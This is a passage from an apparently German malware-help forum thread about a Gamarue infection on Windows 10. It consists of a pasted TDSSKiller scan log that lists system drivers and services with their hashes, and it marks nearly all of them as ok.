21:37:18.0364 0x1ac0 [ E7FD479E3298F3C8852A0D2F092BDB35, 07F2E779268EBBF4F32ED1C8423493B36BA823905E71B524C6AEBA0093193307 ] IRENUM C:\WINDOWS\system32\drivers\irenum.sys
21:37:18.0380 0x1ac0 IRENUM - ok
21:37:18.0396 0x1ac0 [ 65B145143F6E5E1B5A213F0D9F4C4C44, 0E390BD8D7B4B9562E8FEE0D109DCE0D9EA823FD2D20B39FFACE3331F30FE5BC ] irmon C:\WINDOWS\System32\irmon.dll
21:37:18.0411 0x1ac0 irmon - ok
21:37:18.0411 0x1ac0 [ 7FE3B3A30FA20F27AF7022A01C2266BA, 8AB924F08ABF1DCB154B6A3BDB7E3E5A863008B5AFF8E3DB9759848774E00E8A ] isapnp C:\WINDOWS\system32\drivers\isapnp.sys
21:37:18.0427 0x1ac0 isapnp - ok
21:37:18.0442 0x1ac0 [ D492648D96A14BA639B76D177B24CD82, D65D2494BAC8A317FD70293E59D039078D1D19FAE20A4EB2665246CAACFF0C6F ] iScsiPrt C:\WINDOWS\System32\drivers\msiscsi.sys
21:37:18.0474 0x1ac0 iScsiPrt - ok
21:37:18.0489 0x1ac0 [ 6809AB5A3979D1DBA294E548B6CB23B1, 30AAE0C99874570C34A4D750B7049BA28BEFBB55F40A1B4A00A3A19D49332EEF ] jhi_service C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
21:37:18.0505 0x1ac0 jhi_service - ok
21:37:18.0521 0x1ac0 [ D36B404BF979297C6572AEF98B2594F2, CB2F4E6589936D35D59CA70B39A29D091540EA125BE4B937AF92CEA0C6D0AAEB ] kbdclass C:\WINDOWS\System32\drivers\kbdclass.sys
21:37:18.0536 0x1ac0 kbdclass - ok
21:37:18.0536 0x1ac0 [ 7E2036A846789D6D6A2EE21915017EE1, 82AF85CA30B440E453F7694C7EDABB5D2DB213AD2FE8620B92667DFB492229A1 ] kbdhid C:\WINDOWS\System32\drivers\kbdhid.sys
21:37:18.0552 0x1ac0 kbdhid - ok
21:37:18.0567 0x1ac0 [ 4C054B8E901F41F5743DADE8A29FF256, 1009CC2503E08AFEA849BA83135C2D75C573FC4D6EFB5DBCDCC7ACB17AF83152 ] kdnic C:\WINDOWS\System32\drivers\kdnic.sys
21:37:18.0583 0x1ac0 kdnic - ok
21:37:18.0583 0x1ac0 [ EABFCDA6E996F8A32DC1B302F7683BB2, 5FF2BA89D9A7BDE78C40866F15EC576527699ADD0F120E1A8388C4404A69F0E8 ] KeyIso C:\WINDOWS\system32\lsass.exe
21:37:18.0614 0x1ac0 KeyIso - ok
21:37:18.0614 0x1ac0 [ BA7A5838866618A4E82FBC05B8923605, 96E898C7768BED66487A00E02B2E50516602BCF54E6648F5528E3334AE8527EB ] KSecDD C:\WINDOWS\system32\Drivers\ksecdd.sys
21:37:18.0630 0x1ac0 KSecDD - ok
21:37:18.0646 0x1ac0 [ 6629CAA1F157088B9EDD1EAD24C6D753, 3E5F3BCB34F4B52BE46B96F9F720FE5FB37A01D4E408875F6BB89F5B5C5A3900 ] KSecPkg C:\WINDOWS\system32\Drivers\ksecpkg.sys
21:37:18.0661 0x1ac0 KSecPkg - ok
21:37:18.0677 0x1ac0 [ 9778205F28DC4F2EFFCC146647FE5CF0, 6B7EFFB08C7757A2830745920A624F89DBD5B323E0A884932FECF06471894F9D ] ksthunk C:\WINDOWS\system32\drivers\ksthunk.sys
21:37:18.0692 0x1ac0 ksthunk - ok
21:37:18.0708 0x1ac0 [ 08F9C3F7FE3019BF53B1405B1820528F, E90940533F88A33C396E1DF9D186E945F030315FB2201E479F144E27387333CA ] KtmRm C:\WINDOWS\system32\msdtckrm.dll
21:37:18.0755 0x1ac0 KtmRm - ok
21:37:18.0771 0x1ac0 [ 0DD3C5101AE1AA7E28B4CE5AB190C261, FAFFE2102972798210ED5E766F54C5EED6262354E132E1C24539DAA598895608 ] LanmanServer C:\WINDOWS\system32\srvsvc.dll
21:37:18.0817 0x1ac0 LanmanServer - ok
21:37:18.0849 0x1ac0 [ B82D6C634638534E41748FCEC909E55D, C286EB7B3E780549F77E75B4B9F053861D82EFDCD43B1308848A08D23EFADDCA ] LanmanWorkstation C:\WINDOWS\System32\wkssvc.dll
21:37:18.0911 0x1ac0 LanmanWorkstation - ok
21:37:19.0036 0x1ac0 [ F0CF1A5E98B8CEFDA41146173C449985, F8993C93C19CF86A36400C4381D44F90973A27EA0CCA84E1D87541734E06C58A ] Lenovo Instant On C:\Program Files\Lenovo\InstantOn\InstantOnSrv.exe
21:37:19.0130 0x1ac0 Lenovo Instant On - ok
|
|
04.07.2017, 20:50
| #11 |
| | Windows 10 - Gamarue Immernoch Schritt 1: Code:
ATTFilter 21:37:19.0161 0x1ac0 [ F96ADC7EA527C2588CB0A7AA94F23B31, BA317F71F2035DE1CF856381A92463E31DFFB580B23275F34A3770D13313F0FE ] LENOVO.MICMUTE C:\Program Files\LENOVO\HOTKEY\MICMUTE.exe
21:37:19.0177 0x1ac0 LENOVO.MICMUTE - ok
21:37:19.0192 0x1ac0 [ AF1077E89AD4458EC9B1CABB35595346, 762AE3218B7B05032C4199F0AE9ABCC822C3DF88BBB09536202B6B26A7944024 ] lfsvc C:\WINDOWS\System32\lfsvc.dll
21:37:19.0239 0x1ac0 lfsvc - ok
21:37:19.0239 0x1ac0 [ C0CB3B9F1F92C36B91309FDACCDF918B, 5D40C11388A48323D9D9AC18A950B09E2654092BC2F9DE45779A9354668BA18E ] LicenseManager C:\WINDOWS\system32\LicenseManagerSvc.dll
21:37:19.0286 0x1ac0 LicenseManager - ok
21:37:19.0302 0x1ac0 [ FC37745959DFA4871759E4DCC836227A, 8B63F798440FD0A34E2F2940B2598238BC852EF3EFD22147A77AB4BA6FB9E704 ] lltdio C:\WINDOWS\system32\drivers\lltdio.sys
21:37:19.0364 0x1ac0 lltdio - ok
21:37:19.0380 0x1ac0 [ 1797F544956D46966C67A2F7879403A9, D7820D2F8E936FF13D709BA1BD0541AABA8402F38698FE96DAE70B4E7A730835 ] lltdsvc C:\WINDOWS\System32\lltdsvc.dll
21:37:19.0442 0x1ac0 lltdsvc - ok
21:37:19.0442 0x1ac0 [ AE561CB0813D4DFA7D3E4471B2B70F5F, 344EA5E02D04098F032353962C1B70B0F578BCCD2843C70D6330B3F967D2FDB5 ] lmhosts C:\WINDOWS\System32\lmhsvc.dll
21:37:19.0474 0x1ac0 lmhosts - ok
21:37:19.0489 0x1ac0 [ A3115DD6C3CE8BBA7F9C1E5781C41E94, 994512525785766DB5180F0912E213D319A19EF77085868FEB3C866B870EA165 ] LMS C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
21:37:19.0521 0x1ac0 LMS - ok
21:37:19.0552 0x1ac0 [ 67569B50D28182AE1B21C46815CE58D0, 8332604147643BB151DB035F97A611B0D935DA6778266D9913BC945D5789EF87 ] LPlatSvc C:\WINDOWS\system32\LPlatSvc.exe
21:37:19.0583 0x1ac0 LPlatSvc - ok
21:37:19.0599 0x1ac0 [ FD66828B7E8D085FD0F6009444525636, EA9405BA323EF8B1972669713C45DF1F2BF9C4C55310FEE6367FA8C9DE2CC164 ] LSC.Services.SystemService C:\Program Files\Lenovo\Lenovo Solution Center\App\LSC.Services.SystemService.exe
21:37:19.0614 0x1ac0 LSC.Services.SystemService - ok
21:37:19.0630 0x1ac0 [ 16C9D4D822CCA795A72DC88B25A577CC, AEF93AA4E815F90C1A42D574C6DE7EF31FE69AD7B78B8E1AC7C27304F3CD7959 ] LSI_SAS C:\WINDOWS\system32\drivers\lsi_sas.sys
21:37:19.0646 0x1ac0 LSI_SAS - ok
21:37:19.0646 0x1ac0 [ 920F0CFCED5F28A31B79F1C470649D11, 5A5F390F2FD7C26807E7896E9F8F94EE7E69FE3C4B247BEA515588EB076148EF ] LSI_SAS2i C:\WINDOWS\system32\drivers\lsi_sas2i.sys
21:37:19.0661 0x1ac0 LSI_SAS2i - ok
21:37:19.0661 0x1ac0 [ 0FE63316F1C70A0F759A449FAC64C24B, CF99D62FDA862095BA1EB57DD58CEC070E0552E15B6F454B87D593707132636B ] LSI_SAS3i C:\WINDOWS\system32\drivers\lsi_sas3i.sys
21:37:19.0677 0x1ac0 LSI_SAS3i - ok
21:37:19.0677 0x1ac0 [ 80E82C46B27A923A3744531069B63857, C73A200FC2A009D19F2C26FAC07489EA0F4329CD7A1D80EB3200B19DFC883F8D ] LSI_SSS C:\WINDOWS\system32\drivers\lsi_sss.sys
21:37:19.0692 0x1ac0 LSI_SSS - ok
21:37:19.0708 0x1ac0 [ A69A59CD52D26443FF728FD52283598C, E416481B23CDADBB9E608E49C9DC9A520D14935E92CA9B63E7763692DB382D7D ] LSM C:\WINDOWS\System32\lsm.dll
21:37:19.0755 0x1ac0 LSM - ok
21:37:19.0755 0x1ac0 [ 88F5570C04766EE561FF129B2F93030C, A36F7FF563F813EC0F69E5BFB76C58A1C9824F54BA1729C4096E8B7B7C8D90EC ] luafv C:\WINDOWS\system32\drivers\luafv.sys
21:37:19.0786 0x1ac0 luafv - ok
21:37:19.0786 0x1ac0 [ D365217A6D4528ABB41B40C8FBD227E8, 340129785A5788A8FFE0E1B339A616D290F7504F3658F63E1A3B169B38460FBF ] MapsBroker C:\WINDOWS\System32\moshost.dll
21:37:19.0802 0x1ac0 MapsBroker - ok
21:37:19.0817 0x1ac0 [ C3EED732789052C98A2613A7E1C37CDA, D71735C8FB772EEB7F3F304CD79D8D774A9A285A94365DE0E635F61357EC9F0F ] mausbhost C:\WINDOWS\System32\drivers\mausbhost.sys
21:37:19.0833 0x1ac0 mausbhost - ok
21:37:19.0849 0x1ac0 [ 4DCE65116A28488593FF5A6A18B03DB0, AAFA7E7C1C9A38B8CF5CE530F96028191F52B1FDD2790246E413B63CF7C5F02A ] mausbip C:\WINDOWS\System32\drivers\mausbip.sys
21:37:19.0849 0x1ac0 mausbip - ok
21:37:19.0864 0x1ac0 [ 93A9130C4057F6B2284E3237F659A50B, 6DA51BF6E4C38CB6FD86360A5192E3C9998E4E564D65045BF4E885C4FEC03976 ] McNeelUpdate C:\Program Files (x86)\McNeelUpdate\5.0\McNeelUpdateService.exe
21:37:19.0896 0x1ac0 McNeelUpdate - ok
21:37:19.0896 0x1ac0 [ 0609BF877A2F4DEECC62EEE220AB6242, 393268836EB055669997BD05866487497AFC396C9516DA4C4F143679B1DDCA6E ] megasas C:\WINDOWS\system32\drivers\megasas.sys
21:37:19.0911 0x1ac0 megasas - ok
21:37:19.0911 0x1ac0 [ EEC64C8D498D121607C7615FDFBEE4D0, B605B9886C1A05C999B005AEA6D0677DF632E2F34F4FF03F09C2E6C05F554D50 ] megasas2i C:\WINDOWS\system32\drivers\MegaSas2i.sys
21:37:19.0911 0x1ac0 megasas2i - ok
21:37:19.0927 0x1ac0 [ 2B7D3B206833D769218A1F4BE2D73B97, 25901A5E931DC3659993448E59ABC3601B7B0ED9AFEF0F5ECC139D0D0442F73B ] megasr C:\WINDOWS\system32\drivers\megasr.sys
21:37:19.0958 0x1ac0 megasr - ok
21:37:19.0958 0x1ac0 [ C0CBCF18B6F105109566E837461333B7, B2B89D57C1373C6EF4E8C7C4B5AE40AA5596C0B672DB753AC42AC87D56433964 ] MEIx64 C:\WINDOWS\System32\drivers\TeeDriverW8x64.sys
21:37:19.0974 0x1ac0 MEIx64 - ok
21:37:19.0974 0x1ac0 [ 4F708DA590EDBCC124FB79066D44759B, B8DA803299AF5FDE1594CF958EA6B99D4B99E8163438A70A692CA33A96DBF8DE ] MessagingService C:\WINDOWS\System32\MessagingService.dll
21:37:19.0989 0x1ac0 MessagingService - ok
21:37:20.0005 0x1ac0 [ 0AF89452A8CE3928168F4E5B2208C68B, 571F1A9F1F0B31DB5FFAE7FB7F98C16958439D6666A9F2131B0F2E496BF3D2AC ] mi-raysat_3dsmax2015_64 C:\Program Files\Autodesk\3ds Max 2015\NVIDIA\Satellite\raysat_3dsmax2015_64server.exe
21:37:20.0052 0x1ac0 mi-raysat_3dsmax2015_64 - detected UnsignedFile.Multi.Generic ( 1 )
21:37:20.0224 0x1ac0 Detect skipped due to KSN trusted
21:37:20.0224 0x1ac0 mi-raysat_3dsmax2015_64 - ok
21:37:20.0286 0x1ac0 [ 89257B8D3826B5629CF7F73F97DA44F9, F056D67EC82072BA209FF7942862862FDF562F8C038F3128861C387F8F63B494 ] mlx4_bus C:\WINDOWS\System32\drivers\mlx4_bus.sys
21:37:20.0333 0x1ac0 mlx4_bus - ok
21:37:20.0349 0x1ac0 [ 9AE3C0CC0865B1618A3C97744A6A9E9B, BF72AEF0360AC278B36ED31E5BFC2E8F72136B0952490A105CB6929654C97F6C ] MMCSS C:\WINDOWS\system32\drivers\mmcss.sys
21:37:20.0364 0x1ac0 MMCSS - ok
21:37:20.0364 0x1ac0 [ 0CD29540C32C2E2E0E3D7E9832752AF3, E64C3F5323C59D53409E33E88989FDD2A38B5B602336FC1D8C3702CA9B5EBFC7 ] Modem C:\WINDOWS\system32\drivers\modem.sys
21:37:20.0396 0x1ac0 Modem - ok
21:37:20.0396 0x1ac0 [ 534477FCAFDFCA6B841BFA06BD26BCC5, 96404FDF0BA2127A3BD24319637EC0C8BE8C42618D9FEDF66F41C5F72840D427 ] monitor C:\WINDOWS\System32\drivers\monitor.sys
21:37:20.0427 0x1ac0 monitor - ok
21:37:20.0427 0x1ac0 [ F5D4E18A70BA069D479154442CDEB60D, 96345E88BC6A50415E112A4B4CFDF3F4306EA049741C5B0A2BFFC142F15EB5CB ] mouclass C:\WINDOWS\System32\drivers\mouclass.sys
21:37:20.0442 0x1ac0 mouclass - ok
21:37:20.0458 0x1ac0 [ 5C09868963B0C076AC3BC7759A46B7B1, 64CD200A8D90CDC31317009636A3BB6574ABF04BCAC903F93C47823C40CC03F6 ] mouhid C:\WINDOWS\System32\drivers\mouhid.sys
21:37:20.0474 0x1ac0 mouhid - ok
21:37:20.0489 0x1ac0 [ 8BF7039787036529B98E50AE86A0E46B, 69C04D012D026A14E2D2A138EDA79227F9BE4BE1892D517DCDB797F2A5AEDB14 ] mountmgr C:\WINDOWS\system32\drivers\mountmgr.sys
21:37:20.0505 0x1ac0 mountmgr - ok
21:37:20.0505 0x1ac0 [ AD118EC95E9EF4D5223D681D8F183567, 395B76626956F5B7992676B9CA57B2CA075F0CDA881E14B3ED07ABE2DC0EEDBC ] mpsdrv C:\WINDOWS\system32\drivers\mpsdrv.sys
21:37:20.0536 0x1ac0 mpsdrv - ok
21:37:20.0583 0x1ac0 [ FA53A01517BBA97EA3B71CF5CC2052F4, C6F7CBDFAD629B2D4B6ED6A471708E8DBEB5CD5E0A992848359D3C0A82FDFCBE ] MpsSvc C:\WINDOWS\system32\mpssvc.dll
21:37:20.0630 0x1ac0 MpsSvc - ok
21:37:20.0646 0x1ac0 [ 84A7AF1DB4EEBEDBA3F41FF4D3234091, F49E140D0DEA2BB98205A8CA7C0ECB366FFF02D528A83760E9358DFCFF5A90D8 ] MQAC C:\WINDOWS\system32\drivers\mqac.sys
21:37:20.0661 0x1ac0 MQAC - ok
21:37:20.0677 0x1ac0 [ D14C297933C82B8CB0B5CBBA4DDC830B, 2EF356F5373F16A7AE2421187FC5C150C09452C835229275B7403181D65C210F ] MRxDAV C:\WINDOWS\system32\drivers\mrxdav.sys
21:37:20.0692 0x1ac0 MRxDAV - ok
21:37:20.0708 0x1ac0 [ F2AD1B72C5A6475FB5FF332E1980DF88, 41E24496FBD61C0A333F567DA7C4E38C5A792724FB56448189099F60114749D5 ] mrxsmb C:\WINDOWS\system32\DRIVERS\mrxsmb.sys
21:37:20.0724 0x1ac0 mrxsmb - ok
21:37:20.0739 0x1ac0 [ 469DD958B1D8CB09E38BE2298B8C398D, 97CCEFF58D8865B0D27C4E16B082C20FA5279CF01A37F47B5F2DA39B334F0667 ] mrxsmb10 C:\WINDOWS\system32\DRIVERS\mrxsmb10.sys
21:37:20.0755 0x1ac0 mrxsmb10 - ok
21:37:20.0771 0x1ac0 [ 1FC4802B593494746B6FE3BDAC25E371, 774CC950B46B3E32603D368D9938BFCF60D2BB3C14C3FE8B03CB1E724AAC29EF ] mrxsmb20 C:\WINDOWS\system32\DRIVERS\mrxsmb20.sys
21:37:20.0771 0x1ac0 mrxsmb20 - ok
21:37:20.0786 0x1ac0 [ BD12E1941A87671A767447B02C6A51A1, 7FCB3077E827639CE23CC2C6FE997A33F7A702D266C0277AF01453B5ACC0966D ] MsBridge C:\WINDOWS\system32\drivers\bridge.sys
21:37:20.0802 0x1ac0 MsBridge - ok
21:37:20.0802 0x1ac0 [ 41C5D9B52F4A1B30C3F7219D601CF12C, E1C1B1CED19D32FA1B765C7C380B9E749893B2018CF358F448E40DA60CB63166 ] MSDTC C:\WINDOWS\System32\msdtc.exe
21:37:20.0817 0x1ac0 MSDTC - ok
21:37:20.0817 0x1ac0 [ 92C00BD9616F353CA59A755C33269757, E67F05A4A1C44137CCAC0C7292A7010B5920172ACAE32638600E231F28F33035 ] Msfs C:\WINDOWS\system32\drivers\Msfs.sys
21:37:20.0833 0x1ac0 Msfs - ok
21:37:20.0833 0x1ac0 [ F27EC8F7A0A779276E5DA2E70C2B01EE, A450DB309F84CAFFCE2A720612BDB260D88E9C390D2BC60874D73A55D8567E04 ] msgpiowin32 C:\WINDOWS\System32\drivers\msgpiowin32.sys
21:37:20.0849 0x1ac0 msgpiowin32 - ok
21:37:20.0849 0x1ac0 [ CBA955A54C9446CAAD28C76789D3B071, F6CA1BECA35B13B7CCC9FFB325FACF22713F6B81E8A6540C9967A462E425BBEC ] mshidkmdf C:\WINDOWS\System32\drivers\mshidkmdf.sys
21:37:20.0864 0x1ac0 mshidkmdf - ok
21:37:20.0864 0x1ac0 [ E8E568EF60677E4534F387C53EE1B35F, 2E250EE1A9AE8AFDCA5216BED87328B05713386BD7E61C66A74EF021F2AFE7D7 ] mshidumdf C:\WINDOWS\System32\drivers\mshidumdf.sys
21:37:20.0864 0x1ac0 mshidumdf - ok
21:37:20.0880 0x1ac0 [ 16376B7B0730C04DD1A2C0CC8E09E420, 2F39D3254FD272E277B5496A8C93A7CBFBF80F6004AE0343BE9F09C538975910 ] msisadrv C:\WINDOWS\system32\drivers\msisadrv.sys
21:37:20.0880 0x1ac0 msisadrv - ok
21:37:20.0896 0x1ac0 [ 75FE54E84C1EB0C9C5E09F9FD5928ECC, 971CFEE8FB8364D17CD392E32A32AE57BE6461EAB6C580B52E6D752D4CFDD6B3 ] MSiSCSI C:\WINDOWS\system32\iscsiexe.dll
21:37:20.0896 0x1ac0 MSiSCSI - ok
21:37:20.0911 0x1ac0 msiserver - ok
21:37:20.0911 0x1ac0 [ B26E1C10C8323D2B6ADAF504CD487757, 758DBCDA43D62547ED274D2E09A66B266470C86A89A3BEF387E535DB37A7EA44 ] MSKSSRV C:\WINDOWS\system32\DRIVERS\MSKSSRV.sys
21:37:20.0927 0x1ac0 MSKSSRV - ok
21:37:20.0927 0x1ac0 [ E40B960078A15D4901265D32E071C42D, AC11B8221C8F529FE3CA6FEB99AF699664C86008A732C3A8E6B1CE31C2272454 ] MsLldp C:\WINDOWS\system32\drivers\mslldp.sys
21:37:20.0942 0x1ac0 MsLldp - ok
21:37:20.0958 0x1ac0 [ 1EC9FC8E5101139CF84589E8EAC24B9A, F351661FC548FEC2652018B4F1A2BC64FD938637A518EEDC9B6ED97471BAAC9B ] MSMQ C:\WINDOWS\system32\mqsvc.exe
21:37:20.0958 0x1ac0 MSMQ - ok
21:37:20.0958 0x1ac0 [ B4860AB91DC4E73936F0FF504D6B4B07, 7371093D9EB62218D20F6B8B3C88CBF01932AEA2923ED119962A78BE46E5A939 ] MSPCLOCK C:\WINDOWS\system32\DRIVERS\MSPCLOCK.sys
21:37:20.0974 0x1ac0 MSPCLOCK - ok
21:37:20.0989 0x1ac0 [ 8EDC45C3F7F64A51C98B59E24648F74B, 445731F32A37A99FAB3CD5D178A84FB4F835727826211FF18623409D29FF3A1A ] MSPQM C:\WINDOWS\system32\DRIVERS\MSPQM.sys
21:37:21.0005 0x1ac0 MSPQM - ok
21:37:21.0005 0x1ac0 [ 7DA5FAC2A49D30CA5B7B96B8B26281AC, 168C3AA5C7318184D8F67EA832920FCE64E11D4CC418517D7BDACB9632F0BEA8 ] MsRPC C:\WINDOWS\system32\drivers\MsRPC.sys
21:37:21.0021 0x1ac0 MsRPC - ok
21:37:21.0036 0x1ac0 [ 4369BBFCDDCCE61856DD862C8E5C4E19, 23BA06675997A3A46723D0FC9E3DFEBC17E4149FC67B9DCED3011BBB5B5DCFF9 ] MsSecFlt C:\WINDOWS\system32\drivers\mssecflt.sys
21:37:21.0052 0x1ac0 MsSecFlt - ok
21:37:21.0052 0x1ac0 [ 7E3365C8BC83DCE88D6226BB5C7170C4, 69D741039CAAFCA93A4CC09CEC14F117527D732A6CF3077AA83E935B03EC3F9C ] mssmbios C:\WINDOWS\System32\drivers\mssmbios.sys
21:37:21.0052 0x1ac0 mssmbios - ok
21:37:21.0067 0x1ac0 [ 09D51564E49181E9928910D6B91C920E, FB3C918820ACF4506AC49478709B4D4C6489BA0B5113E666C34B916CA5CD6DE7 ] MSTEE C:\WINDOWS\system32\DRIVERS\MSTEE.sys
21:37:21.0083 0x1ac0 MSTEE - ok
21:37:21.0083 0x1ac0 [ 793AE56A3946EAD5F906C28D294FEFE6, BB563D088084026606C2FBD30A0850BA18363CC173CC6C77272D727CA6C1F9BD ] MTConfig C:\WINDOWS\System32\drivers\MTConfig.sys
21:37:21.0099 0x1ac0 MTConfig - ok
21:37:21.0099 0x1ac0 [ E35F51C7474A26680627477462715206, 435490915CDD416D666B64C6B4526285EC946E6918CFA85585692B9ED43518B6 ] Mup C:\WINDOWS\system32\Drivers\mup.sys
21:37:21.0114 0x1ac0 Mup - ok
21:37:21.0114 0x1ac0 [ 74BD1149BF50F1E24934042A3BD17C90, DC4626DC4D629CA7DF336EC7E6435F27D2E252D81945E57F4BF2C981DBCD9B45 ] mvumis C:\WINDOWS\system32\drivers\mvumis.sys
21:37:21.0114 0x1ac0 mvumis - ok
21:37:21.0130 0x1ac0 [ BC7747F959BBA12C1ACD1BD483B9DC91, 81562A3CCF35A770A0562A576834A34E16AC730C061038A544768439E4B29102 ] MyWiFiDHCPDNS C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe
21:37:21.0146 0x1ac0 MyWiFiDHCPDNS - ok
21:37:21.0146 0x1ac0 [ 39C772E20B8C61858F969E4D60699D89, 32146D265CD315597C48FB233D77DDACB0FEDDB7E800A0F411A67844BB3ACC67 ] NativeWifiP C:\WINDOWS\system32\DRIVERS\nwifi.sys
21:37:21.0192 0x1ac0 NativeWifiP - ok
21:37:21.0208 0x1ac0 [ BC80F85C129F12A5F64D6741A120B539, AD410F13BCBDE54F98E353BD4DAF30CC5A0A9990FC4F1AB3623EF3175EEBCAF7 ] NaturalAuthentication C:\WINDOWS\System32\NaturalAuth.dll
21:37:21.0239 0x1ac0 NaturalAuthentication - ok
21:37:21.0239 0x1ac0 [ F2EA6F3165E154C24C084AC35DD6C3F8, 4F8CB75770945F5A28CC308917A124109F7462CE933695B9CAA3FE2CAE76C445 ] NcaSvc C:\WINDOWS\System32\ncasvc.dll
21:37:21.0271 0x1ac0 NcaSvc - ok
21:37:21.0286 0x1ac0 [ 9B3C6582CFB91BA2A04B1D06D8E2FB98, 431E6B075FD24002724E8A2ED9FB3221AD66D1F1D021B56466187D97E5B43A1F ] NcbService C:\WINDOWS\System32\ncbservice.dll
21:37:21.0333 0x1ac0 NcbService - ok
21:37:21.0333 0x1ac0 [ 932E2E43078A3D786A46A5428F21B314, 17F1CC3388D80F1E1850063114C1EB72EEA149D9C8FA3501C0F9EB55C9E0C58D ] NcdAutoSetup C:\WINDOWS\System32\NcdAutoSetup.dll
21:37:21.0396 0x1ac0 NcdAutoSetup - ok
21:37:21.0396 0x1ac0 [ 0FFE8AF1B94C5FD54E6ACC6DAE990D31, B67D3CA3460D4700D8B83EFE4B6A7AA940650E84D985484FBAA1EE80F3632133 ] ndfltr C:\WINDOWS\System32\drivers\ndfltr.sys
21:37:21.0427 0x1ac0 ndfltr - ok
21:37:21.0474 0x1ac0 [ E27876B335FEB441DA511030AA85624D, 6B4FA08463166A2B32F317E6FEDE3C22EB8FFA5B2077955A0B2F2184858BDDE7 ] NDIS C:\WINDOWS\system32\drivers\ndis.sys
21:37:21.0521 0x1ac0 NDIS - ok
21:37:21.0521 0x1ac0 [ 4EA73CFDEE4A628D387D95464A131F29, 38A6E2389FA9B20A7AFDF3CFCD13B66489B92D853EE486BF81019F0A36A142E1 ] NdisCap C:\WINDOWS\system32\drivers\ndiscap.sys
21:37:21.0536 0x1ac0 NdisCap - ok
21:37:21.0552 0x1ac0 [ EB127689AF6F24091AB73538A556257F, BC25067D355084D6893E9262750433044C28893BB27A67BF7AF5008742C6D359 ] NdisImPlatform C:\WINDOWS\system32\drivers\NdisImPlatform.sys
21:37:21.0567 0x1ac0 NdisImPlatform - ok
21:37:21.0567 0x1ac0 [ 73B4C72FB6170A08C64BDA92DE93ECF7, 766BBE659232F0F5EAEE577EE88091FB76175BC52D65B9637126069C97E795D4 ] NdisTapi C:\WINDOWS\system32\DRIVERS\ndistapi.sys
21:37:21.0583 0x1ac0 NdisTapi - ok
21:37:21.0599 0x1ac0 [ 6704F27EB15A5B30AA7FA5A4F4D1FD47, 841F99B3C751F4D4E23C0E7B5C275B4871C1D5EF937A93129DF64DF49F6B6736 ] Ndisuio C:\WINDOWS\system32\drivers\ndisuio.sys
21:37:21.0614 0x1ac0 Ndisuio - ok
21:37:21.0614 0x1ac0 [ FE87CCAA89433FC306A80F15E848F4B2, 3269FDF53DA59057E066D582FCBB96B71C8063B8F488856A9DEA414B4797E43A ] NdisVirtualBus C:\WINDOWS\System32\drivers\NdisVirtualBus.sys
21:37:21.0614 0x1ac0 NdisVirtualBus - ok
21:37:21.0630 0x1ac0 [ 94517BC9F29A1B73D377F1BF1C3DCA34, 45A34D7AAA851C643E80C0F61CBF8544B8A2E8E7DAB2D5AB6F3A34FDEE4AB0B3 ] NdisWan C:\WINDOWS\System32\drivers\ndiswan.sys
21:37:21.0646 0x1ac0 NdisWan - ok
21:37:21.0661 0x1ac0 [ 94517BC9F29A1B73D377F1BF1C3DCA34, 45A34D7AAA851C643E80C0F61CBF8544B8A2E8E7DAB2D5AB6F3A34FDEE4AB0B3 ] ndiswanlegacy C:\WINDOWS\system32\DRIVERS\ndiswan.sys
21:37:21.0692 0x1ac0 ndiswanlegacy - ok
21:37:21.0708 0x1ac0 [ AC6AC99075732F5C29DB0004DD5B1AC6, 684EC821EF5C60DA540CA36EC192B09E62440AAD5B13F0F4C23DDC4A9B96F28C ] ndproxy C:\WINDOWS\system32\DRIVERS\NDProxy.sys
21:37:21.0724 0x1ac0 ndproxy - ok
21:37:21.0724 0x1ac0 [ 9AC090451D92E6081EB89CDA83D74189, D4D442412F112853AA8D88DFB5F695AE4E8E2C361905992537EE53BE675FECE8 ] Ndu C:\WINDOWS\system32\drivers\Ndu.sys
21:37:21.0755 0x1ac0 Ndu - ok
21:37:21.0771 0x1ac0 [ A115DDB2C7805C41EEC9A5276FF5764E, FC81D0BE2DAAC6E7161C0FC5C90050022A39AD50E28040D5357C0E1FD6C0B6B5 ] NetAdapterCx C:\WINDOWS\system32\drivers\NetAdapterCx.sys
21:37:21.0786 0x1ac0 NetAdapterCx - ok
21:37:21.0802 0x1ac0 [ F420B6CAB5151A38E4DBBFFB500C11DA, 271F495B261461B8EA847BFDD87C155E6DC1B6236C161B8253A1F023706B1B1D ] NetBIOS C:\WINDOWS\system32\drivers\netbios.sys
21:37:21.0817 0x1ac0 NetBIOS - ok
21:37:21.0833 0x1ac0 [ 30C2F67EC84EB11B22011620107E0325, 98088685F457566FD8D13B83A0BF6B06CDC70AC156B67BF87A8A8446C150C1F3 ] NetBT C:\WINDOWS\system32\DRIVERS\netbt.sys
21:37:21.0864 0x1ac0 NetBT - ok
21:37:21.0880 0x1ac0 [ EABFCDA6E996F8A32DC1B302F7683BB2, 5FF2BA89D9A7BDE78C40866F15EC576527699ADD0F120E1A8388C4404A69F0E8 ] Netlogon C:\WINDOWS\system32\lsass.exe
21:37:21.0896 0x1ac0 Netlogon - ok
21:37:21.0896 0x1ac0 [ D9FF8CA42C3541F4840693F17143C595, B05FB0B6439B34BD93EE59DC48BBE3D712A7428EFBFE37A887CE8546E57EE68F ] Netman C:\WINDOWS\System32\netman.dll
21:37:21.0942 0x1ac0 Netman - ok
21:37:21.0942 0x1ac0 [ 4D37150AB4D61598919AB70ACFD1369A, 9ABF73213988ED9AA72B2658F8B91967A24C7CC2049859D86CE9C51A4AB57A84 ] NetMsmqActivator C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
21:37:21.0958 0x1ac0 NetMsmqActivator - ok
21:37:21.0958 0x1ac0 [ 4D37150AB4D61598919AB70ACFD1369A, 9ABF73213988ED9AA72B2658F8B91967A24C7CC2049859D86CE9C51A4AB57A84 ] NetPipeActivator C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
21:37:21.0989 0x1ac0 NetPipeActivator - ok
21:37:22.0005 0x1ac0 [ 96173660A4DD4A56E4B8938A67DAD9B7, F1D8F94625C6461DB89F8D3BDC73748F8A7F3446694BD1F148AF9BE6F17E9543 ] netprofm C:\WINDOWS\System32\netprofmsvc.dll
21:37:22.0052 0x1ac0 netprofm - ok
